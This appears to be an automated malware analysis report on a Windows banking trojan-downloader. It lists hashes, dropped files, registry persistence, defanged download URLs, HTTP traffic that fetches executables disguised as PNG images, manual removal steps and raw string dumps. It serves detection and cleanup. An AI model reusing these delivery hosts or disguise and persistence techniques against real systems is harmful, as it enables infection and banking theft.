HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Gen:Variant.Barys.547 (B) (Emsisoft), Gen:Variant.Barys.547 (AdAware), Trojan-Banker.Win32.Brasil.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Banker, Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: d340d14427a8b2fc99ac434826471633
SHA1: b2f409befabf46c35df59c821963f68d83ddb615
SHA256: b89cc8136a1d98d1feda39c61ab3058f63f240a84586dbd6509944812eba2a4b
SSDeep: 24576:dmV0PI0ZwjRpha/Ll6FfRjiQsWv85VJsgty:dlI0Zu7ILIjiQsFfeQy
Size: 1048064 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, ACProtect141
Company: infidus vilitas facio
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
net1.exe:2028
net.exe:420
mscorsvw.exe:1912
%original file name%.exe:472
The Trojan injects its code into the following process(es):
AvastK.exe:1520
AvastV.exe:1252
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process AvastK.exe:1520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\EMBUTIR1.exe (105 bytes)
The process %original file name%.exe:472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\AvastK.exe (16954 bytes)
%Documents and Settings%\%current user%\Application Data\AvastV.exe (54343 bytes)
The process AvastV.exe:1252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\mip.dat (38 bytes)
%Documents and Settings%\%current user%\Application Data\idpc.d (9 bytes)
%Documents and Settings%\%current user%\Application Data\icone.cur (326 bytes)
Registry activity
The process net1.exe:2028 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 BC EE 26 A3 3A C1 33 AD CF 81 20 AF 9F 5B 12"
The process AvastK.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A D9 60 A0 06 20 8A E8 91 CC E4 B7 6A B5 E0 BC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process net.exe:420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 0E 9B CF FB 4B 6D 0E 2C 1B 8D E2 2A 0F C4 E6"
The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"
The process %original file name%.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 46 B9 A6 3B EE 77 34 C0 7B C5 49 24 FC 23 40"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"AvastV.exe" = "AvastV"
"AvastK.exe" = "AvastK"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process AvastV.exe:1252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 8C F8 C8 0B 93 F6 4E 76 CB DE 84 8F 8E 60 1D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoChangeStartMenu" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"noclose" = "0"
"NoLogOff" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DesktopU" = "%Documents and Settings%\%current user%\Application Data\AvastV.exe"
Dropped PE files
MD5 | File path |
---|---|
4d4435ccf1ebc2763aaa0da2fb693af7 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AvastK.exe |
00bda0312fb0cc6a27ff977d6f5e5b29 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\AvastV.exe |
436c8bca82066f05f6152161bb4450ab | c:\Documents and Settings\"%CurrentUserName%"\Application Data\EMBUTIR1.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
net1.exe:2028
net.exe:420
mscorsvw.exe:1912
%original file name%.exe:472 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\EMBUTIR1.exe (105 bytes)
%Documents and Settings%\%current user%\Application Data\AvastK.exe (16954 bytes)
%Documents and Settings%\%current user%\Application Data\AvastV.exe (54343 bytes)
%Documents and Settings%\%current user%\Application Data\mip.dat (38 bytes)
%Documents and Settings%\%current user%\Application Data\idpc.d (9 bytes)
%Documents and Settings%\%current user%\Application Data\icone.cur (326 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DesktopU" = "%Documents and Settings%\%current user%\Application Data\AvastV.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 934912 | 934912 | 4.48199 | 6b7b952038ce3993f0e37f0336abbcb2 |
DATA | 942080 | 8164 | 8192 | 3.12131 | 6f05714e4fd75635a3cbecb646fc0d59 |
BSS | 950272 | 4549 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 958464 | 10824 | 11264 | 3.4188 | b561ce93d5f0ad04493a26e69b4ba223 |
.tls | 970752 | 16 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 974848 | 24 | 512 | 0.139033 | 0326ef98f785f08357d324c6fabf81c1 |
.reloc | 978944 | 57492 | 57856 | 4.61083 | 4908082c562d09e805b3be4046370b1b |
.rsrc | 1040384 | 34304 | 34304 | 3.02535 | b417de969b404560d03aa0410159a811 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://sodesasystem.com/guayos/modules/mod_jcomments/images/ht/_x_.png | |
hxxp://sodesasystem.com/guayos/modules/mod_jcomments/images/ht/w_x_.png | |
hxxp://igrejaeterna.com.br/media/editors/codemirror/css/codemirror.txt | |
hxxp://thanhhaievent.com/modules/mod_articles_archive/tmpl/html/o/o.php | 112.78.2.207 |
hxxp://www.igrejaeterna.com.br/media/editors/codemirror/css/codemirror.txt | 199.201.88.34 |
hxxp://www.sodesasystem.com/guayos/modules/mod_jcomments/images/ht/_x_.png | 69.73.159.23 |
hxxp://www.sodesasystem.com/guayos/modules/mod_jcomments/images/ht/w_x_.png | 69.73.159.23 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /guayos/modules/mod_jcomments/images/ht/_x_.png HTTP/1.1
Content-Type: text/html
Host: VVV.sodesasystem.com
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
HTTP/1.1 200 OK
Date: Thu, 11 Dec 2014 13:38:41 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
ETag: "393600-5469eebf-1b3fa9566fd6953c"
Last-Modified: Mon, 17 Nov 2014 12:49:03 GMT
Content-Type: image/png
Content-Length: 3749376
Vary: User-Agent
Cache-Control: public, max-age=604800
Expires: Thu, 18 Dec 2014 13:38:41 GMT
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................Z'...................@...........................9..................@...............................1... ....%.....................d"..................................................................................CODE................................ ..`DATA.....}.......~..................@...BSS..........p.......Z...................idata...1.......2...Z..............@....tls.....................................rdata..............................@..P.reloc..d".......$..................@..P.rsrc.....%.. ....%.................@..P..............9......69.............@..P..................................................................................................................................................................@...Boolean...........@..False.True.@.,.@...Char..........@.@...Smallint..........X.@...Integer...........p.@...Byte............@...Word............@...Cardinal............@...Double..@...@...Currency....@...String..@...WideString..@...Variant.@.D.@.............................D.@..........6@..6@..6@..6@..6@..4@.$4@.`4@..TObjectP.@...TObjectD.@........System..p.@...IInterface....................F.System......D$....N...D$... N...D$...5N......@...@...@....................F..@..........@.8.@...@.............
<<< skipped >>>
GET /media/editors/codemirror/css/codemirror.txt HTTP/1.1
Content-Type: text/html
Host: VVV.igrejaeterna.com.br
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; it;rv:1.8.1.12)
HTTP/1.1 200 OK
Date: Thu, 11 Dec 2014 13:38:48 GMT
Server: Apache
Last-Modified: Sat, 04 Oct 2014 20:12:05 GMT
ETag: "2605805-26-5049e76a36139"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain
4D88B41DB11FC174D87A9E32D370D5369D3092..
GET /guayos/modules/mod_jcomments/images/ht/w_x_.png HTTP/1.1
Content-Type: text/html
Host: VVV.sodesasystem.com
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
HTTP/1.1 200 OK
Date: Thu, 11 Dec 2014 13:38:44 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
ETag: "13e400-546b3858-f33bee62cde292a0"
Last-Modified: Tue, 18 Nov 2014 12:15:20 GMT
Content-Type: image/png
Content-Length: 1303552
Vary: User-Agent
Cache-Control: public, max-age=604800
Expires: Thu, 18 Dec 2014 13:38:44 GMT
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d...|.......s............@..........................`...................@..............................r'.......H...................P..8............................@......................................................CODE.....d.......d.................. ..`DATA.....V.......X...h..............@...BSS.....e................................idata..r'.......(..................@....tls.........0...........................rdata.......@......................@..P.reloc..8....P......................@..P.rsrc....H.......H..................@..P.............`......................@..P..................................................................................................................................................................@...Boolean...........@..False.True.@.,.@...Char..........@.@...Smallint..........X.@...Integer...........p.@...Byte............@...Word............@...Cardinal............@...String..@...............................@.........|>@..>@..>@..>@..>@..;@..;@.$<@..TObject..@...TObject..@........System..0.@...IInterface....................F.System......D$...MQ...D$...kQ...D$...uQ....].@.g.@.q.@....................F}.@..........@...@...@...........................@.......@.|>@..b@..b@..>@.
<<< skipped >>>
GET /modules/mod_articles_archive/tmpl/html/o/o.php HTTP/1.1
Content-Type: text/html
Host: thanhhaievent.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 403 Forbidden
Server: nginx admin
Date: Thu, 11 Dec 2014 13:38:46 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1
Connection: keep-alive
...
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
AvastV.exe_1252:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
comctl32.dll
comctl32.dll
USER32.DLL
USER32.DLL
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp$
OnKeyUp$
PasswordChar
PasswordChar
OnKeyUp
OnKeyUp
ssHorizontal
ssHorizontal
OnKeyUpd'D
OnKeyUpd'D
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword
HelpKeyword
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
OnExecute
OnExecute
OnExecute
OnExecute
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
tagMSG
tagMSG
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
TDXTCPClient
TDXTCPClient
1.2.3
1.2.3
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
WS2_32.DLL
WS2_32.DLL
127.0.0.1
127.0.0.1
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsU
TIdStackWindowsU
IdStackWindows
IdStackWindows
%s, %d %s %d %s %s
%s, %d %s %d %s %s
password
password
Password
Password
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPasswordT
ProxyPasswordT
ProxyPort
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
ClientPortMinT
ClientPortMinT
ClientPortMax
ClientPortMax
Port
Port
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
EIdInvalidPortRangeSVW
libeay32.dll
libeay32.dll
ssleay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
X509_STORE_CTX_get_current_cert
des_set_key
des_set_key
saUsernamePassword
saUsernamePassword
PasswordT
PasswordT
0.0.0.1
0.0.0.1
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
IdTCPConnection
EIdTCPConnectionError
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
TPasswordEvent
TPasswordEvent
Certificate
Certificate
RootCertFiletz@
RootCertFiletz@
CertFiletz@
CertFiletz@
KeyFile
KeyFile
OnGetPassword
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertErrorP
EIdOSSLLoadingCertErrorP
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClient
IdTCPClient
IdTCPClient
BoundPort
BoundPort
PortU
PortU
CommentURL
CommentURL
TIdHTTPMethod
TIdHTTPMethod
IdHTTP
IdHTTP
TIdHTTPOption
TIdHTTPOption
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPResponseT
TIdHTTPResponseT
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPProtocol
TIdHTTPProtocol
TIdCustomHTTP
TIdCustomHTTP
TIdCustomHTTP
TIdCustomHTTP
TIdHTTP
TIdHTTP
TIdHTTPP
TIdHTTPP
HTTPOptions
HTTPOptions
Port(
Port(
EIdHTTPProtocolException
EIdHTTPProtocolException
HTTPS
HTTPS
https
https
This request method is supported in HTTP 1.1
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
OnActionExecute
OnActionExecute
Portable Network Graphics
Portable Network Graphics
UXTHEME.DLL
UXTHEME.DLL
c:\program files\borland\delphi7\Lib\ASXPVS.pas
c:\program files\borland\delphi7\Lib\ASXPVS.pas
TSQLTimeStampVariantType
TSQLTimeStampVariantType
TSQLTimeStampData
TSQLTimeStampData
SqlTimSt
SqlTimSt
ole32.dll
ole32.dll
SQLTimeStamp
SQLTimeStamp
Password
Password
TLoginDialog
TLoginDialog
TPasswordDialog
TPasswordDialog
c:\program files\borland\delphi7\Lib\ACXPVS.pas
c:\program files\borland\delphi7\Lib\ACXPVS.pas
c:\program files\borland\delphi7\Lib\CEXPVS.pas
c:\program files\borland\delphi7\Lib\CEXPVS.pas
iexplore.exe
iexplore.exe
COMCTL32.DLL
COMCTL32.DLL
TaskDialogIndirect
TaskDialogIndirect
c:\program files\borland\delphi7\Lib\AOBXPVS.pas
c:\program files\borland\delphi7\Lib\AOBXPVS.pas
URLColor
URLColor
OnKeyPress
OnKeyPress
TMonochromeLookup
TMonochromeLookup
Uh.LO
Uh.LO
edt_bcd4KeyPress
edt_bcd4KeyPress
edt_bcd1KeyPress
edt_bcd1KeyPress
edt_bcd2KeyPress
edt_bcd2KeyPress
edt_bcd3KeyPress
edt_bcd3KeyPress
edt_casKeyPress
edt_casKeyPress
edt_dchKeyPress
edt_dchKeyPress
edt_tkdKeyPress
edt_tkdKeyPress
edt_seeKeyPress
edt_seeKeyPress
edt_isefKeyPress
edt_isefKeyPress
edt_eleKeyPress
edt_eleKeyPress
edt_eluKeyPress
edt_eluKeyPress
edt_elpKeyPress
edt_elpKeyPress
edt_elfKeyPress
edt_elfKeyPress
edt_itbfKeyPress
edt_itbfKeyPress
edt_dtiKeyPress
edt_dtiKeyPress
edt_sepKeyPress
edt_sepKeyPress
edt_itbf2KeyPress
edt_itbf2KeyPress
edt_seuKeyPress
edt_seuKeyPress
edt_tkfKeyPress
edt_tkfKeyPress
edt_tkeKeyPress
edt_tkeKeyPress
edt_tkpKeyPress
edt_tkpKeyPress
edt_tkuKeyPress
edt_tkuKeyPress
SKINDATA.SK2
SKINDATA.SK2
edt_stkKeyPress
edt_stkKeyPress
edt_siasKeyPress
edt_siasKeyPress
Software\Microsoft\Windows\DWM
Software\Microsoft\Windows\DWM
ic.cur
ic.cur
icone.cur
icone.cur
chrome
chrome
opera
opera
"!@#**%&* ()_ |:****?
"!@#**%&* ()_ |:****?
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
inflate 1.2.3 Copyright 1995-2005 Mark Adler
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetWindowsDirectoryA
GetWindowsDirectoryA
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
keybd_event
keybd_event
VkKeyScanA
VkKeyScanA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
GetAsyncKeyState
GetAsyncKeyState
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
olepro32.dll
olepro32.dll
shell32.dll
shell32.dll
ShellExecuteExA
ShellExecuteExA
ShellExecuteA
ShellExecuteA
wsock32.dll
wsock32.dll
gdiplus.dll
gdiplus.dll
GdipSetImageAttributesColorKeys
GdipSetImageAttributesColorKeys
GdipSetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
GdiplusShutdown
GdiplusShutdown
winmm.dll
winmm.dll
?$?*?2?=?
?$?*?2?=?
? ?$?(?,?
? ?$?(?,?
=#='= =;=
=#='= =;=
6}7
6}7
4 4&424:4
4 4&424:4
6%6 676?6{6
6%6 676?6{6
6074787
6074787
: :$:(:6:>:
: :$:(:6:>:
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
;)
;)
0!0%0)0-010
0!0%0)0-010
; ;$;(;,;0;4;8;\;|;
; ;$;(;,;0;4;8;\;|;
6|7
6|7
01l1
01l1
2 2$2(2,2024282
2 2$2(2,2024282
3.42464
3.42464
8Â8Q8c8
8Â8Q8c8
;!;/;_
;!;/;_
4-4J4Y4j4}4
4-4J4Y4j4}4
:":':1:;:@:
:":':1:;:@:
0 0$0(0,0004080
0 0$0(0,0004080
8"8&8*8.8
8"8&8*8.8
4 4$4(4,4044484
4 4$4(4,4044484
2 2(20282
2 2(20282
040'1;1`1
040'1;1`1
40`0>3~3
40`0>3~3
=$=)=-=1=5=9===,>
=$=)=-=1=5=9===,>
7$7(7,7074787
7$7(7,7074787
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
"%UUU""
"%UUU""
""""""""""$DDDDDDD""UUUUUUUR"""""""""""DDDDDDDB"%UUUUUUU""""""""""
""""""""""$DDDDDDD""UUUUUUUR"""""""""""DDDDDDDB"%UUUUUUU""""""""""
%UUUUUUU"
%UUUUUUU"
""#2"3"""
""#2"3"""
$"#2"3"%"
$"#2"3"%"
"""3#2"""
"""3#2"""
$""3#2"%"
$""3#2"%"
"""#3""""
"""#3""""
$""#3""%"
$""#3""%"
""""""""""%UUUUUUU""DDDDDDDB
""""""""""%UUUUUUU""DDDDDDDB
""""""""""%UUUUUUU""DDDDDDDB"""""""""""UUUUUUUR"$DDDDDDD""""""""""
""""""""""%UUUUUUU""DDDDDDDB"""""""""""UUUUUUUR"$DDDDDDD""""""""""
% ) CmDEpsMOab
% ) CmDEpsMOab
'2699640**
'2699640**
33333333333333
33333333333333
337373?3
337373?3
333373?33
333373?33
33333337
33333337
3733333
3733333
3337333
3337333
3333373
3333373
3737333
3737333
373333?3
373333?3
3333333333
3333333333
333333333
333333333
333?33?333
333?33?333
333373?3
333373?3
33333333330
33333333330
"66DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD6666/"!
"66DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD6666/"!
66DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD6666/"!
66DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD6666/"!
?===>=>)=>(9"/
?===>=>)=>(9"/
'99(999:99770
'99(999:99770
""""3333""""
""""3333""""
fQTv....Rtlb
fQTv....Rtlb
:1 =;;= 1
:1 =;;= 1
===8:] ==;= 1
===8:] ==;= 1
:#==;= 1
:#==;= 1
::';;= 1
::';;= 1
:::'=;= 1
:::'=;= 1
*=== - ==;= 1
*=== - ==;= 1
== .- =;;= 1
== .- =;;= 1
#&'7'61=;= 1
#&'7'61=;= 1
%,./0000/0.-,%
%,./0000/0.-,%
*-....-..--*
*-....-..--*
$),,---.,-,)($
$),,---.,-,)($
%(*)))),)(%
%(*)))),)(%
}?|}?|}?|}?|}?|
}?|}?|}?|}?|}?|
"""!"""@
"""!"""@
3331333@
3331333@
0000000000
0000000000
00000000003
00000000003
60??0000
60??0000
...???0000?
...???0000?
000000000000
000000000000
0?.CPB@@iiggec\\Y@@!BBO 'P***C
0?.CPB@@iiggec\\Y@@!BBO 'P***C
.??0??...
.??0??...
.????0?.CCCC"mgec\\@@!BB 'P*CC'
.????0?.CCCC"mgec\\@@!BB 'P*CC'
.??00000??.Cc\Y@
.??00000??.Cc\Y@
00?.CP\@@BBO 'PC
00?.CP\@@BBO 'PC
C\\@@@!BB 'PP*CC.BO**PP OOOO 'PP**
C\\@@@!BB 'PP*CC.BO**PP OOOO 'PP**
U"""""Ã3333D"""""$
U"""""Ã3333D"""""$
#::""::#
#::""::#
33333330
33333330
%%%###==
%%%###==
=##%%%#/9
=##%%%#/9
%%%####%%####==
%%%####%%####==
]\[ZY/US*(%F
]\[ZY/US*(%F
$&)-/--)))"
$&)-/--)))"
$#$&)--)&&$'
$#$&)--)&&$'
($#$)--)-))&,
($#$)--)-))&,
*)&)-//--)%
*)&)-//--)%
')&)-////--!
')&)-////--!
1'$%'*...**'*"
1'$%'*...**'*"
1%#%'*. *'%%,
1%#%'*. *'%%,
-%#%'***..*'2
-%#%'***..*'2
,*'*..33.*6
,*'*..33.*6
/*'*....**)
/*'*....**)
,&$%&( . ((("
,&$%&( . ((("
,%$%(( ((&%*
,%$%(( ((&%*
*%$%( . (&-
*%$%( . (&-
) ( .... 0
) ( .... 0
,(( .... '
,(( .... '
.dddd
.dddd
3;88558;855//3-
3;88558;855//3-
3
3
#....JaJ,))))#
#....JaJ,))))#
;58;;80008;84 7
;58;;80008;84 7
8511-/0.
8511-/0.
`111/--/*
`111/--/*
7141----*
7141----*
8144----,'
8144----,'
66666666
66666666
..vEeeei4
..vEeeei4
2"""22%2"2"2"2"
2"""22%2"2"2"2"
555555555
555555555
3333""""#
3333""""#
B"""$DDDDDDD"""""""""""""""""""""""""%UUUUUUU""""Va
B"""$DDDDDDD"""""""""""""""""""""""""%UUUUUUU""""Va
fffffR"""%UUUUUUU""""(
fffffR"""%UUUUUUU""""(
11111111111
11111111111
000000000
000000000
